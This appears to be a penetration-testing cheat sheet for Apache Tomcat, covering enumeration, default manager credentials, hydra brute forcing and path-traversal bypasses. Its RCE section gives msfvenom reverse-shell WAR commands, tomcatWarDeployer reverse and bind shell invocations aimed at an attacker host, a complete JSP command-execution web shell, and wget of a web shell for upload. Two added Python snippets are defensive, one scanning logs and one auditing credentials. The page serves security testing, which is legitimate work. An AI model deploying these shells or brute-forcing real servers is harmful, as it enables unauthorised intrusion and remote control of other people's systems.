# Tomcat
{{#include ../../../banners/hacktricks-training.md}}
## Discovery
- It usually runs on **port 8080**
- **Common Tomcat error:**
<figure><img src="../../../images/image (150).png" alt=""><figcaption></figcaption></figure>
## Enumeration
### **Version Identification**
To find the version of Apache Tomcat, a simple command can be executed:
```bash
curl -s http://tomcat-site.local:8080/docs/ | grep Tomcat
```
This searches for the term "Tomcat" in the documentation index page, revealing the version in the title tag of the HTML response.
### **Manager Files Location**
Identifying the exact location of the **`/manager`** and **`/host-manager`** directories is essential, since their names may have been changed. A brute-force search is recommended to locate these pages.
### **Username Enumeration**
For Tomcat versions prior to 6, usernames can be enumerated with:
```bash
msf> use auxiliary/scanner/http/tomcat_enum
```
### **Default Credentials**
The **`/manager/html`** directory is particularly sensitive because it allows uploading and deploying WAR files, which can lead to code execution. This directory is protected by basic HTTP authentication, with common credentials including:
- admin:admin
- tomcat:tomcat
- admin:
- admin:s3cr3t
- tomcat:s3cr3t
- admin:tomcat
These credentials can be tested using:
```bash
msf> use auxiliary/scanner/http/tomcat_mgr_login
```
Another notable directory is **`/manager/status`**, which displays the Tomcat and operating system versions, helping to identify vulnerabilities.
### **Brute Force Attack**
To attempt a brute force attack on the manager directory, one can use:
```bash
hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.64 http-get /manager/html
```
Along with setting various parameters in Metasploit to target a specific host.
## Common Vulnerabilities
### **Password Backtrace Disclosure**
In lucky cases, accessing `/auth.jsp` may disclose the password in a backtrace.
### **Double URL Encoding**
The CVE-2007-1860 vulnerability in `mod_jk` allows double URL encoding path traversal, giving unauthorized access to the management interface through a specially crafted URL.
To access the management web page of Tomcat, go to: `pathTomcat/%252E%252E/manager/html`
### /examples
Apache Tomcat versions 4.x to 7.x include example scripts that are susceptible to information disclosure and cross-site scripting (XSS) attacks. These scripts, listed comprehensively below, should be checked for unauthorized access and potential exploitation. Find [more info](https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks/)
- /examples/jsp/num/numguess.jsp
- /examples/jsp/dates/date.jsp
- /examples/jsp/snp/snoop.jsp
- /examples/jsp/error/error.html
- /examples/jsp/sessions/carts.html
- /examples/jsp/checkbox/check.html
- /examples/jsp/colors/colors.html
- /examples/jsp/cal/login.html
- /examples/jsp/include/include.jsp
- /examples/jsp/forward/forward.jsp
- /examples/jsp/plugin/plugin.jsp
- /examples/jsp/jsptoserv/jsptoservlet.jsp
- /examples/jsp/simpletag/foo.jsp
- /examples/jsp/mail/sendmail.jsp
- /examples/servlet/HelloWorldExample
- /examples/servlet/RequestInfoExample
- /examples/servlet/RequestHeaderExample
- /examples/servlet/RequestParamExample
- /examples/servlet/CookieExample
- /examples/servlet/JndiServlet
- /examples/servlet/SessionExample
- /tomcat-docs/appdev/sample/web/hello.jsp
### **Path Traversal Vulnerability**
In some [**vulnerable Tomcat configurations**](https://www.acunetix.com/vulnerabilities/web/tomcat-path-traversal-via-reverse-proxy-mapping/) you can access protected directories in Tomcat using the path `/..;/`.
So, for example, you might be able to **access the Tomcat manager** page by requesting `www.vulnerable.com/lalala/..;/manager/html`.
**Another way** to bypass protected paths is to request `http://www.vulnerable.com/;param=value/manager/html`.
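As an added example (not part of the original page), the following Python scans Tomcat access-log lines for the three bypass shapes described above (`/..;/`, a `;param=value` segment ahead of `/manager`, and the double-encoded `%252E%252E`) and reports the client, path and reason. The log lines are constructed samples, and the `LOG_RE`, `classify_request` and `scan_access_log` names are this example's own.

```python
import re
from urllib.parse import unquote
# Constructed sample lines in Tomcat's default "common" access-log pattern.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /docs/ HTTP/1.1" 200 1034
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /lalala/..;/manager/html HTTP/1.1" 200 2473
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /;param=value/manager/html HTTP/1.1" 200 2473
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /app/%252E%252E/manager/html HTTP/1.1" 200 2473
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /manager/html HTTP/1.1" 401 2473
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
ADMIN_APPS = ("/manager", "/host-manager")

def normalize_path(raw):
    """Percent-decode repeatedly (bounded) so %252E%252E collapses to '..'."""
    path = raw
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def classify_request(raw_path):
    """Reason string if the request looks like an admin-app bypass, else None."""
    decoded = normalize_path(raw_path)
    hits = [decoded.find(app) for app in ADMIN_APPS if app in decoded]
    if not hits:
        return None
    if decoded != raw_path and ".." in decoded:
        return "encoded dot-dot traversal (CVE-2007-1860 style)"
    if "/..;/" in decoded:
        return "dot-dot-semicolon traversal (reverse proxy mapping)"
    if ";" in decoded[:min(hits)]:  # ;param=value in a segment before /manager
        return "path parameter before admin app"
    return None

def scan_access_log(text):
    """Return (client_ip, raw_path, status, reason) for every flagged line."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            ip, _method, path, status = m.groups()
            reason = classify_request(path)
            if reason:
                findings.append((ip, path, int(status), reason))
    return findings
```

A 200 on any flagged line is the signal worth alerting on: it means the front-end ACL and Tomcat disagreed about the path and the admin app answered.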
## RCE
Finally, if you have access to the Tomcat Web Application Manager, you can **upload and deploy a .war file (execute code)**.
### Limitations
You will only be able to deploy a WAR if you have **sufficient privileges** (roles: **admin**, **manager** and **manager-script**). These details are usually found in _tomcat-users.xml_, typically located at `/usr/share/tomcat9/etc/tomcat-users.xml` (this varies between versions) (see the [POST](#post) section).
```bash
# tomcat6-admin (debian) or tomcat6-admin-webapps (rhel) has to be installed
# deploy under "path" context path
curl --upload-file monshell.war -u 'tomcat:password' "http://localhost:8080/manager/text/deploy?path=/monshell"
# undeploy
curl "http://tomcat:Password@localhost:8080/manager/text/undeploy?path=/monshell"
```
### Metasploit
```bash
use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set rhost <IP>
msf exploit(multi/http/tomcat_mgr_upload) > set rport <port>
msf exploit(multi/http/tomcat_mgr_upload) > set httpusername <username>
msf exploit(multi/http/tomcat_mgr_upload) > set httppassword <password>
msf exploit(multi/http/tomcat_mgr_upload) > exploit
```
### MSFVenom Reverse Shell
1. Create the war to deploy:
```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LPORT> -f war -o revshell.war
```
2. Upload the `revshell.war` file and access it (`/revshell/`).
### Bind and reverse shell with [tomcatWarDeployer.py](https://github.com/mgeeky/tomcatWarDeployer)
In some scenarios this may not work (for example, old versions of sun).
#### Download
```bash
git clone https://github.com/mgeeky/tomcatWarDeployer.git
```
#### Reverse shell
```bash
./tomcatWarDeployer.py -U <username> -P <password> -H <ATTACKER_IP> -p <ATTACKER_PORT> <VICTIM_IP>:<VICTIM_PORT>/manager/html/
```
#### Bind shell
```bash
./tomcatWarDeployer.py -U <username> -P <password> -p <bind_port> <victim_IP>:<victim_PORT>/manager/html/
```
### Using [Clusterd](https://github.com/hatRiot/clusterd)
```bash
clusterd.py -i 192.168.1.105 -a tomcat -v 5.5 --gen-payload 192.168.1.6:4444 --deploy shell.war --invoke --rand-payload -o windows
```
### Manual method - Web shell
Create **index.jsp** with this [content](https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp):
```jsp
<FORM METHOD=GET ACTION='index.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
    String cmd = request.getParameter("cmd");
    String output = "";
    if(cmd != null) {
        String s = null;
        try {
            Process p = Runtime.getRuntime().exec(cmd,null,null);
            BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
            while((s = sI.readLine()) != null) { output += s+"</br>"; }
        } catch(IOException e) { e.printStackTrace(); }
    }
%>
<pre><%=output %></pre>
```
```bash
mkdir webshell
cp index.jsp webshell
cd webshell
jar -cvf ../webshell.war *
# webshell.war is created
# Upload it
```
You can also install this program (which allows upload, download and command execution): [http://vonloesch.de/filebrowser.html](http://vonloesch.de/filebrowser.html)
### Manual method 2
Get a JSP web shell such as [this one](https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp) and create a WAR file:
```bash
wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
zip -r backup.war cmd.jsp
# When this file is uploaded to the manager GUI, the /backup application will be added to the table.
# Go to: http://tomcat-site.local:8180/backup/cmd.jsp
```
## POST
The Tomcat credentials file is named `tomcat-users.xml`; it defines which roles each user holds in tomcat.
```bash
find / -name tomcat-users.xml 2>/dev/null
```
```xml
[...]
<!--
By default, no user is included in the "manager-gui" role required
to operate the "/manager/html" web application. If you wish to use this app,
you must define such a user - the username and password are arbitrary.
Built-in Tomcat manager roles:
- manager-gui - allows access to the HTML GUI and the status pages
- manager-script - allows access to the HTTP API and the status pages
- manager-jmx - allows access to the JMX proxy and the status pages
- manager-status - allows access to the status pages only
-->
[...]
<role rolename="manager-gui" />
<user username="tomcat" password="tomcat" roles="manager-gui" />
<role rolename="admin-gui" />
<user username="admin" password="admin" roles="manager-gui,admin-gui" />
```
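An added example, not from the original page: this Python audits a `tomcat-users.xml` for the default credential pairs listed in the Default Credentials section above and for accounts holding the admin-app roles named in the Limitations section. The XML is a constructed sample modelled on the excerpt above (the `xmlns` is the one Tomcat ships), and `audit_tomcat_users` is this example's own name.

```python
import xml.etree.ElementTree as ET

# Default credential pairs listed on this page, and the roles this page names
# as sufficient to use the manager apps (manager-script is the /manager/text API).
DEFAULT_CREDS = {("admin", "admin"), ("tomcat", "tomcat"), ("admin", ""),
                 ("admin", "s3cr3t"), ("tomcat", "s3cr3t"), ("admin", "tomcat")}
ADMIN_ROLES = {"admin", "manager", "manager-gui", "manager-script", "admin-gui"}

# Constructed sample modelled on the excerpt above.
SAMPLE_XML = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="admin-gui"/>
  <role rolename="manager-status"/>
  <user username="tomcat" password="tomcat" roles="manager-gui"/>
  <user username="admin" password="admin" roles="manager-gui,admin-gui"/>
  <user username="monitor" password="constructed-long-random-pw" roles="manager-status"/>
</tomcat-users>
"""

def _local(tag):
    """Strip the XML namespace so 'user' matches with or without xmlns."""
    return tag.split("}")[-1]

def audit_tomcat_users(xml_text):
    """Return (username, finding) pairs: default credentials and admin-app roles."""
    root = ET.fromstring(xml_text)
    findings = []
    for el in root.iter():
        if _local(el.tag) != "user":
            continue
        # Old Tomcat releases used the 'name' attribute instead of 'username'.
        name = el.get("username") or el.get("name", "")
        password = el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        if (name, password) in DEFAULT_CREDS:
            findings.append((name, "default credential pair"))
        privileged = sorted(roles & ADMIN_ROLES)
        if privileged:
            findings.append((name, "admin-app role(s): " + ",".join(privileged)))
    return findings

if __name__ == "__main__":
    for user, finding in audit_tomcat_users(SAMPLE_XML):
        print(f"{user}: {finding}")
```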
## Other Tomcat scanning tools
- [https://github.com/p0dalirius/ApacheTomcatScanner](https://github.com/p0dalirius/ApacheTomcatScanner)
## References
- [https://github.com/simran-sankhala/Pentest-Tomcat](https://github.com/simran-sankhala/Pentest-Tomcat)
- [https://hackertarget.com/sample/nexpose-metasploitable-test.pdf](https://hackertarget.com/sample/nexpose-metasploitable-test.pdf)
{{#include ../../../banners/hacktricks-training.md}}